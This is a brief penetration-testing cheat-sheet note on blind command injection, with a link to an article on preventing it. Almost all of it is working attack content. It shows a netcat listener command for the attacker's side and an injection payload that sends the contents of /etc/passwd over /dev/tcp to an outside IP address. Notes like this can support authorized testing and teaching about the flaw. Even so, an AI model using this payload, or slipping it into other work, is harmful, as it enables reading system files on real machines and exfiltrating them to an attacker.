CMD Injection. Send the result of command to an attacker's machine¶
Send the result of command to an attacker's nc¶
At an attacker's machine
nc -nlvp 9090
Payload
cat /etc/passwd > /dev/tcp/192.168.45.194/9090
References¶
- https://www.rangeforce.com/blog/how-to-prevent-blind-command-injection ^e403ca